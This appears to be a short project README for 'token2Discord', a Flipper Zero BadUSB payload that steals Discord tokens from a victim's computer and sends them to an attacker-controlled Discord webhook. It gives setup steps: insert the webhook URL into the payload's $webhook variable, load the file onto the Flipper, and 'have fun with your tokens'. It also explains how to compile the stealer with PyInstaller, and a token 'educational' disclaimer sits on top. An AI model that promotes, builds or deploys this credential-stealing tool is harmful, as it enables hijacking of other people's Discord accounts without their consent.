Home

Awesome

token2Discord

Exfiltrate discord tokens and send them via discord webhook using the flipperzero

Disclaimer

This utility is strictly for educational and/or purposes of which an employer has authority to do so. The user, YOU, are responsible for the usage of such utility. With that said, use it wisely and legally.

Prerequisites

1. Python3 (optional if building your own payload)
2. Discord Webhook

Setup

# Plug and Play!!
# edit token2Discord.txt
Input your discord webhook in the payload file (txt file)
$webhook = 'DISCORD_WEBHOOK'

Save token2Discord.txt to flipper, and have fun with your tokens!!!

Compile (if you want your own)

• Be sure PyInstaller is installed $ pip3 install -r requirements.txt

python3 -m PyInstaller token2Discord.py --onefile

Key note